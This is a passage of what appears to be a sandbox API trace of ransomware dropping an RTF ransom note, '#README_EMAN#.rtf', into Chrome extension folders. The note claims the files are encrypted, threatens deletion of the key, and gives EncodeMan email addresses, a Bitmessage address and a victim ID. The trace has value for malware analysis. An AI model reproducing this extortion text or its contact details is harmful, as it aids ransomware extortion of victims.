ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.060] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0288.060] WriteFile (in: hFile=0x2ec, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0288.060] CloseHandle (hObject=0x2ec) returned 1 [0288.060] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\#readme_eman#.rtf")) returned 0xffffffff [0288.061] GetLastError () returned 0x2 [0288.061] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0288.076] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 